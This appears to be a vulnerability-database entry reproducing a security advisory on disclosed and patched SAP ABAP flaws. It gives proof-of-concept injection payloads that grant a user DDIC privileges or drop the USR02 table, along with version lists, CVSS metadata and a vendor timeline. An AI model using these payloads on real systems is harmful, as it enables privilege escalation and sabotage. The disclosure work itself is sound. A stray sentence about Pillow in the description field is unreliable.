5) [CVE-2021-21465] Native SQL Injection Vulnerability in SAP Business Warehouse (Database Interface)

The vulnerable function does not perform any input validation or
output sanitization on import parameters that can be used to define
conditional SQL statements. This allows to inject arbitrary SQL
commands that get executed natively at database level in the course
of execution of the function.

The following payload exploits the bug to escalate privileges via
reference user assignment:

Import Table: I_S_TABSEL
 ╒══════════════════════════════════════════════════════════════╕
 │ NAME                                                         │
 ╞══════════════════════════════════════════════════════════════╡
 │ USR02                                                        │
 ╘══════════════════════════════════════════════════════════════╛

Import Table: I_S_DBCON
 ╒══════════════════════════════════════════════════════════════╕
 │ CON_NAME                                                     │
 ╞══════════════════════════════════════════════════════════════╡
 │ <Database Connection String> (e.g. DEFAULT)                  │
 ╘══════════════════════════════════════════════════════════════╛

Import Table: I_T_DBFIELDS
 ╒═══════════════╤═════════╤════════════════════════════════════╕
 │ NAME          │ TYPE    │   LENGTH                           │
 ╞═══════════════╪═════════╪════════════════════════════════════╡
 │ BNAME         │ CHAR255 │   000255                           │
 ╘══════════════════════════════════════════════════════════════╛

Import Table: I_T_SELECT
 ╒══════════════════════╤════════╤══════════════════════════════╕
 │ FIELDNM              │ OPTION │LOW                           │
 ╞══════════════════════╪════════╪══════════════════════════════╡
 │ BNAME                │ EQ     │'';UPDATE USREFUS SET REFUSER │
 │                      │        │='DDIC' WHERE '1              │
 ├──────────────────────┼────────┼──────────────────────────────┤
 │ ' = '1 AND' AND BNAME│ EQ     │'ATTACKER';                   │
 ╘══════════════════════════════════════════════════════════════╛

6) [CVE-2021-21466] Code Injection Vulnerability in SAP Business Warehouse and SAP BW/4HANA

The vulnerable function makes use of the INSERT REPORT instruction
by providing source code that is created dynamically using untrusted
user input. As there is no input validation or output sanitization,
an attacker can inject malicious ABAP code through specific import
parameters. Inserted code may be executed by chaining this bug with
CVE-2021-21473.

The following payload exploits the bug to escalate privileges via
reference user assignment:

Import Parameter:   I_TABLE_NAME
Value:               INJECTION

Import Parameter:   I_DEBUG_SUFFIX
Value:               SAP

Import Table: I_T_RANGE_STRING
 ╒═══════════╤═════════════════════════════════════╤════════════╕
 │ CHANM     │ LOW                                 │ HIGH       │
 ╞═══════════╪═════════════════════════════════════╪════════════╡
 │ BNAME     │ '. UPDATE USREFUS SET REFUSER       │ '. EXIT. " │
 │           │ = 'DDIC' WHERE BNAME = 'ATTACKER    │            │
 ╘═══════════╧═════════════════════════════════════╧════════════╛

7) [CVE-2021-21473] Missing Authorization Check in SAP NetWeaver AS ABAP and ABAP Platform

The vulnerable function uses a dynamically generated program name (based
on data from untrusted sources) in a SUBMIT call. No authorization checks
are programmatically enforced. Thus, a remote, unauthorized attacker can
leverage this function to start any existing ABAP report by providing the
respective report name in the import parameter REPORTNAME.

8) [CVE-2021-33678] Code Injection vulnerability in SAP NetWeaver AS ABAP (Reconciliation Framework)

The vulnerable function makes use of the GENERATE SUBROUTINE POOL instruction
in form 'get_dynamic_fields' by providing source code that is created
dynamically using untrusted user input. As there is no input validation or
output sanitization, an attacker can inject malicious ABAP code through specific
import parameters. These parameters are limited in size due to their variable
type. This restricts an attacker in exploitation scenarios. However, it is still
possible, for example, to delete critical system tables by exploiting this bug.

The following payload exploits the bug to drop table USR02, leading to a complete
loss of availability of the target system:

Import Parameter:   RTABNAME
Value:               X. EXEC SQL. DROP TABLE USR02-

Import Parameter:   RFIELDNAME
Value:               ENDEXEC

Vulnerable / tested versions:

All tests were conducted on SAP NetWeaver Application Server ABAP 752 SP04 and ABAP Platform 1909. No additional testing on other releases has been carried out. According to the vendor the following releases and versions are affected by the discovered vulnerabilities:

1) SAP NetWeaver (ABAP Server) and ABAP Platform, Versions - 700, 701, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755 Components: SAP_BW, SAP_BW_VIRTUAL_COMP

2) SAP AS ABAP (DMIS), Versions - 2011_1_620, 2011_1_640, 2011_1_700, 2011_1_710, 2011_1_730, 2011_1_731, 2011_1_752, 2020; SAP S4 HANA(DMIS), Versions - 101, 102, 103, 104, 105 Components: DMIS, S4CORE

3) SAP NetWeaver AS ABAP (SAP Landscape Transformation - DMIS), Versions - 2011_1_620, 2011_1_640, 2011_1_700, 2011_1_710, 2011_1_730, 2011_1_731, 2011_1_752, 2020; SAP S4 HANA (SAP Landscape Transformation), Versions - 101, 102, 103, 104, 105 Components: DMIS, S4CORE

4) SAP Business Warehouse, Versions - 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, 782 Components: SAP_BW, SAP_BW_VIRTUAL_COMP

5) SAP Business Warehouse, Versions - 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, 782 Components: SAP_BW, SAP_BW_VIRTUAL_COMP

6) SAP Business Warehouse, Versions - 700, 701, 702, 711, 730, 731, 740, 750, 782; SAP BW4HANA, Versions - 100, 200 Components: SAP_BW, DW4CORE

7) SAP NetWeaver AS ABAP and ABAP Platform, Versions - 700, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755 Components: SAP_BASIS

8) SAP NetWeaver AS ABAP (Reconciliation Framework) - 700, 701, 702, 710, 711, 730, 731, 740, 750, 751, 752, 75A, 75B, 75B, 75C, 75D, 75E, 75F Components: SAP_ABA

Vendor contact timeline:

The following timelines have been split for each CVE/vulnerability, as different contacts were responsible. All identified vulnerabilities have been fixed by now by SAP and SEC Consult releases this security advisory adhering to the responsible disclosure policy.

CVE-2020-6318

2020-08-12 | Contacting vendor with detailed report through vulnerability submission web form. 2020-08-13 | Vendor confirms receipt and assigns security incident number #2080354772. 2020-08-19 | Vendor confirms vulnerability. 2020-08-24 | Vendor informs about patch development strategy. 2020-09-07 | Vendor informs about release of the patch, registration of CVE number and corresponding security note. 2020-09-08 | Vendor releases patch with SAP Security Note 2958563.

CVE-2020-26808

2020-09-24 | Contacting vendor with detailed report through vulnerability submission web form. 2020-09-25 | Vendor confirms receipt and assigns security incident number #2070354293. 2020-10-20 | Contacting vendor to request progress information. 2020-10-21 | Vendor confirms vulnerability and states that a fix is in development. 2020-11-09 | Vendor informs about release of the patch, registration of CVE number and corresponding security note. 2020-11-10 | Vendor releases patch with SAP Security Note 2973735.

CVE-2020-26832

2020-10-23 | Contacting vendor with detailed report through vulnerability submission web form. 2020-10-26 | Vendor confirms receipt and assigns security incident number #2070432866. 2020-11-17 | Vendor confirms vulnerability and proposes CVSS score of 7.6. 2020-11-23 | Vendor asks for exploit script shown in the initial report. 2020-11-24 | Providing the requested script via encrypted PGP mail. 2020-12-07 | Vendor informs about release of the patch, registration of CVE number and corresponding security note. 2020-12-08 | Vendor releases patch with SAP Security Note 2993132.

CVE-2021-21465 / CVE-2021-21468

2020-10-27 | Contacting vendor with detailed report through vulnerability submission web form. 2020-10-29 | Vendor confirms receipt and assigns separated security incident numbers #2070446047 and #2070446050. 2020-11-06 | Vendor confirms vulnerability and predicts patches to be released on December Patch Tuesday 2020. 2020-11-18 | Vendor confirms that they are still on track for December Patch Tuesday 2020. 2020-12-01 | Vendor informs that patch needs to be postponed to January Patch Tuesday 2021. 2021-01-08 | Vendor informs about release of patches and clarifies that a single security note will fix both issues. Additional information about CVSS scores is provided. 2021-01-11 | Vendor informs about release of the patches, registration of CVE numbers and corresponding security note. 2021-01-12 | Vendor releases patches with SAP Security Note 2986980.

CVE-2021-21466 / CVE-2021-21473

2020-11-25 | Contacting vendor with detailed report through vulnerability submission web form. 2020-11-27 | Vendor confirms receipt and assigns security incident number #2080396648. 2021-01-04 | Vendor confirms vulnerability and states that they are working on a fix. Additional information is provided detailing on that they will split the reported finding into two separated security issues and security incident numbers #2080396648 and #2080412695. 2021-01-11 | Vendor informs about release of the first patch, registration of CVE number and corresponding security note. 2021-01-11 | Vendor informs about patch release for the first issue. Additional information is provided describing that a patch for the second issue is still in development. 2021-01-12 | Vendor releases first patch with SAP Security Note 2999854. 2021-05-07 | Asking vendor for update regarding the second issue. 2021-05-11 | Vendor informs that fix is in progress and note will be released soon. 2021-06-07 | Vendor informs about release of the second patch, registration of CVE number and corresponding security note. 2021-06-08 | Vendor releases second patch with SAP Security Note 3002517.

CVE-2021-33678

2021-02-01 | Contacting vendor with detailed report through vulnerability submission web form. 2021-02-03 | Vendor confirms receipt and assigns security incident number #2180074995. 2021-05-07 | Asking vendor for update. 2021-05-11 | Vendor informs that fix is in progress. 2021-07-12 | Vendor informs about release of the patch, registration of CVE number and corresponding security note. 2021-07-13 | Vendor releases patch with SAP Security Note 3048657.

Solution:

SAP SE reacted promptly to our findings. Product Security Incident Response Team (PSRT) and engineers released patches in a timely manner for each of the reported issues. These patches are available in form of SAP Security Notes which can be accessed via the SAP Customer Launchpad [5]. More information can also be found at the Official SAP Product Security Response Space [6].

The following Security Notes need to be implemented:

2958563, 2973735, 2993132, 2986980, 2999854, 3002517, 3048657

[5] https://launchpad.support.sap.com/#/securitynotes [6] https://wiki.scn.sap.com/wiki/display/PSR/SAP+Security+Patch+Day

Workaround:

None

Advisory URL:

https://sec-consult.com/vulnerability-lab/


SEC Consult Vulnerability Lab

SEC Consult, an Atos company
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
Atos company. It ensures the continued knowledge gain of SEC Consult in the
field of network and application security to stay ahead of the attacker. The
SEC Consult Vulnerability Lab supports high-quality penetration testing and
the evaluation of new offensive and defensive technologies for our customers. 
Hence our customers obtain the most current information about vulnerabilities
and valid recommendation about the risk profile of new technologies.

Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult

EOF F. Hagg, A. Meier / @2022

Show details on source website

JSON

To clipboard

{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202106-0705",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "netweaver as abap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sap",
        "version": "755"
      },
      {
        "model": "netweaver as abap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sap",
        "version": "740"
      },
      {
        "model": "netweaver as abap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sap",
        "version": "711"
      },
      {
        "model": "netweaver as abap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sap",
        "version": "753"
      },
      {
        "model": "netweaver as abap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sap",
        "version": "750"
      },
      {
        "model": "netweaver as abap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sap",
        "version": "702"
      },
      {
        "model": "netweaver as abap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sap",
        "version": "751"
      },
      {
        "model": "netweaver as abap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sap",
        "version": "700"
      },
      {
        "model": "netweaver as abap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sap",
        "version": "730"
      },
      {
        "model": "netweaver as abap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sap",
        "version": "754"
      },
      {
        "model": "netweaver as abap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sap",
        "version": "710"
      },
      {
        "model": "netweaver as abap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sap",
        "version": "731"
      },
      {
        "model": "netweaver as abap",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "sap",
        "version": "752"
      },
      {
        "model": "netweaver as abap",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sap",
        "version": null
      },
      {
        "model": "netweaver as abap",
        "scope": null,
        "trust": 0.8,
        "vendor": "sap",
        "version": null
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-007825"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-21473"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver_as_abap:752:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver_as_abap:753:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver_as_abap:754:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver_as_abap:700:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver_as_abap:710:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver_as_abap:730:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver_as_abap:731:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver_as_abap:750:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver_as_abap:711:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver_as_abap:740:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver_as_abap:751:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver_as_abap:702:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              },
              {
                "cpe23Uri": "cpe:2.3:a:sap:netweaver_as_abap:755:*:*:*:*:*:*:*",
                "cpe_name": [],
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2021-21473"
      }
    ]
  },
  "credits": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/credits#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Fabian Hagg",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202106-473"
      }
    ],
    "trust": 0.6
  },
  "cve": "CVE-2021-21473",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "SINGLE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 6.5,
            "confidentialityImpact": "PARTIAL",
            "exploitabilityScore": 8.0,
            "id": "CVE-2021-21473",
            "impactScore": 6.4,
            "integrityImpact": "PARTIAL",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.9,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "LOW",
            "baseScore": 6.3,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "exploitabilityScore": 2.8,
            "id": "CVE-2021-21473",
            "impactScore": 3.4,
            "integrityImpact": "LOW",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "Low",
            "baseScore": 6.3,
            "baseSeverity": "Medium",
            "confidentialityImpact": "Low",
            "exploitabilityScore": null,
            "id": "CVE-2021-21473",
            "impactScore": null,
            "integrityImpact": "Low",
            "privilegesRequired": "Low",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2021-21473",
            "trust": 1.8,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202106-473",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202104-975",
            "trust": 0.6,
            "value": "MEDIUM"
          },
          {
            "author": "VULMON",
            "id": "CVE-2021-21473",
            "trust": 0.1,
            "value": "MEDIUM"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2021-21473"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2021-007825"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202106-473"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202104-975"
      },
      {
        "db": "NVD",
        "id": "CVE-2021-21473"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "SAP NetWeaver AS ABAP and ABAP Platform, versions - 700, 702, 710, 711, 730, 731, 740, 750, 751, 752, 753, 754, 755, contains function module SRM_RFC_SUBMIT_REPORT which fails to validate authorization of an authenticated user thus allowing an unauthorized user to execute reports in SAP NetWeaver ABAP Platform. SAP NetWeaver AS for ABA and  ABAP Platform Is vulnerable to a lack of authentication.Information is obtained, information is tampered with, and service is disrupted  (DoS) It may be put into a state. Pillow is a Python-based image processing library. \nThere is currently no information about this vulnerability, please feel free to follow CNNVD or manufacturer announcements. SEC Consult Vulnerability Lab Security Advisory \u003c 20220518-0 \u003e\n=======================================================================\n               title: Multiple Critical Vulnerabilities\n             product: SAP\u00ae Application Server\n                      ABAP and ABAP\u00ae Platform (Different Software Components)\n  vulnerable version: see section \"Vulnerable /  tested versions\"\n       fixed version: see SAP security notes 2958563, 2973735,\n                      2993132, 2986980, 2999854, 3002517, 3048657\n          CVE number: CVE-2020-6318, CVE-2020-26808, CVE-2020-26832,\n                      CVE-2021-21465, CVE-2021-21468, CVE-2021-21466,\n                      CVE-2021-21473, CVE-2021-33678\n              impact: critical\n            homepage: https://www.sap.com\n               found: 08/2020 - 02/2021\n                  by: Fabian Hagg (Office Vienna)\n                      Alexander Meier (Office Berlin)\n                      SEC Consult Vulnerability Lab\n\n                      An integrated part of SEC Consult, an Atos company\n                      Europe | Asia | North America\n\n                      https://www.sec-consult.com\n\n=======================================================================\n\nVendor description:\n-------------------\n\"SAP is a market share leader in enterprise resource planning (ERP),\nanalytics, supply chain management, human capital management, master\ndata management, data integration as well as in experience management\"\n[1]. Customers comprise 92% of the Forbes Global 2000 companies and\n98% of the 100 most valued brands. 77% of the world\u2019s transaction revenue\ntouches an SAP system [1, 2]. \n\n\"SAP NetWeaver Application Server for ABAP (AS ABAP) is a platform on\nwhich important business processes run. It provides a complete development\nand runtime environment for ABAP-based applications. The purpose of AS ABAP\nis to provide programmers with an efficient means of expressing business\nlogic and relieve them from the necessity of platform-related and purely\ntechnical coding. AS ABAP is therefore a basis for all ABAP systems\" [3]. \n\n\"The [successor] ABAP platform provides a reliable and scalable server\nand programming environment for modern ABAP development [...]. The ABAP\nplatform offers support for SAP HANA and SAP Fiori and allows developers\nto efficiently build enterprise software that meets the requirements of\ntheir business scenarios \u2013 on-premise as well as in the cloud\" [4]. \n\n[1] https://www.sap.com/about/company.html\n[2] https://www.sap.com/documents/2017/04/4666ecdd-b67c-0010-82c7-eda71\n     af511fa.html\n[3] https://help.sap.com/viewer/ff18034f08af4d7bb33894c2047c3b71/7.52.5/\n     en-US/797de8aa42e24916953c4bb3d983662d.html\n[4] https://developers.sap.com/topics/abap-platform.html\n\n\nBusiness recommendation:\n------------------------\nBy exploiting the vulnerabilities documented in this advisory, privileged\nattackers can take complete control of affected application servers. Thus,\nsuccessful exploitation can enable fraud, sabotage or data theft while\naffecting confidentiality, integrity, and availability of business data. \n\nSEC Consult recommends to implement security notes 2958563, 2973735,\n2993132, 2986980, 2999854, 3002517, 3048657 where the documented issues\nare fixed according to the vendor. We advise installing the corrections\nas a matter of priority to keep business-critical data secured. \n\n\nVulnerability overview/description:\n-----------------------------------\nAdvanced Business Application Programming (ABAP)\u00ae is a proprietary\nprogramming language by SAP SE. In common with every other programming\nlanguage, ABAP can be susceptible to software vulnerabilities ranging\nfrom missing or improper authorization checks to inadequate input\nvalidation and output sanitization. Of particular concern are injection\nvulnerabilities, which can jeopardize the overall system security. \n\nRemote Function Call (RFC) is a proprietary network protocol by SAP SE. \nComparable to application programming interfaces (APIs), SAP systems\ncome with thousands of built-in function modules implemented in ABAP. RFC\nallows remote-enabled functions to be accessed via the network. This makes\nit possible to decentralize business applications even across system\nboundaries. External programs and external clients can make use of RFC\nconnections to interact with an SAP system via libraries (e.g. NW RFC SDK)\nprovisioned by SAP SE. \n\nThis advisory covers multiple critical vulnerabilities discovered in\nthe ABAP\u00ae coding of standard function modules. These are part of different\nsoftware components that build upon the bedrock products SAP\u00ae Application\nServer ABAP and ABAP\u00ae Platform. \n\n1) [CVE-2020-6318] Code Injection Vulnerability in SAP NetWeaver\n    (ABAP Server) and ABAP Platform\n\n    Function modules RSDU_LIST_DB_TABLE_SYB and RSDU_LIST_DB_TABLE_DB4\n    of function groups RSDU_UTIL_SYB and RSDU_CORE_UTIL_DB4 are vulnerable\n    to ABAP code injection bugs allowing to execute arbitrary ABAP\n    code. Successful exploitation leads to full system compromise. \n\n2) [CVE-2020-26808] Code Injection Vulnerability in SAP AS ABAP\n    and S/4 HANA (DMIS)\n\n    Function module CNV_MBT_SEL_STRING_RETURN of function group\n    CNV_MBT_SEL is vulnerable to an ABAP code injection bug allowing to\n    embed arbitrary code into the ABAP Repository. An attacker can abuse\n    this bug by invoking the function remotely via the RFC protocol. \n    Successful exploitation leads to full system compromise. \n\n3) [CVE-2020-26832] Missing Authorization Check in SAP NetWeaver\n    AS ABAP and SAP S4 HANA (SAP Landscape Transformation)\n\n    Function module CNV_GET_USERS_FOR_APP_SERVER of function group\n    CNV_00001_HELP does not perform any programmatically implemented\n    authorization check. An attacker can abuse this bug by invoking\n    the function remotely via the RFC protocol. Successful exploitation\n    allows to retrieve internal information and to make a targeted SAP\n    system completely unavailable to its intended users. The latter\n    is to be considered as a Denial of Service (DoS) attack. \n\n4) [CVE-2021-21468] Missing Authorization Check in SAP Business\n    Warehouse (Database Interface)\n\n    Function module RSDL_DB_GET_DATA_BWS of function group RSDL does\n    not perform any programmatically implemented authorization check. \n    An attacker can abuse this bug by invoking the function remotely\n    via the RFC protocol. Successful exploitation allows to read out\n    the entire database including cross-client data access. \n\n5) [CVE-2021-21465] Native SQL Injection Vulnerability in SAP\n    Business Warehouse (Database Interface)\n\n    Function module RSDL_DB_GET_DATA_BWS of function group RSDL is\n    vulnerable to a native SQL injection (ADBC) bug allowing to execute\n    arbitrary SQL commands at database level. An attacker can abuse\n    this bug by invoking the function remotely via the RFC protocol. \n    Successful exploitation leads to full system compromise. \n\n6) [CVE-2021-21466] Code Injection Vulnerability in SAP Business\n    Warehouse and SAP BW/4HANA\n\n    Function module RSDRI_DF_TEXT_READ of function group RSDRI_DF_FACADE\n    is vulnerable to an ABAP code injection bug allowing to embed\n    arbitrary code into the ABAP Repository. An attacker can abuse this\n    bug by invoking the function remotely via the RFC protocol. Successful\n    exploitation leads to full system compromise. An attacker can abuse this bug by invoking the function remotely\n    via the RFC protocol. Successful exploitation allows an attacker to\n    execute existing ABAP reports without holding sufficient authorizations. \n\n8) [CVE-2021-33678] Code Injection vulnerability in SAP NetWeaver AS ABAP\n    (Reconciliation Framework)\n\n    Function module CONVERT_FROM_CHAR_SORT_RFW of function group FG_RFW contains\n    a code injection vulnerability with a limited exploitation primitive. An\n    attacker can abuse this bug to delete critical system tables (e.g. USR02),\n    making the targeted SAP system completely unavailable to its intended users. \n\n\nProof of concept:\n-----------------\n\n1) [CVE-2020-6318] Code Injection Vulnerability in SAP NetWeaver\n    (ABAP Server) and ABAP Platform\n\n    The vulnerable functions make use of the GENERATE SUBROUTINE POOL\n    instruction by providing source code that is created dynamically\n    using untrusted user input. As there is no input validation or\n    output sanitization, an attacker can inject malicious ABAP code\n    through specific import parameters. This code gets executed on the\n    fly by the application server in the course of execution of the\n    functions. \n\n    The following payload exploits the bug to escalate privileges via\n    reference user assignment:\n\n    Import Parameter:        I_TABLNM\n    Value:                   USR02\n\n    Import Table: I_T_SELECT_FIELDS\n     \u2552\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2555\n     \u2502 RSD_FIELDNM                                                   \u2502\n     \u255e\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2561\n     \u2502 BNAME                                                         \u2502\n     \u2558\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255b\n    Import Table: I_T_WHERE_COND\n     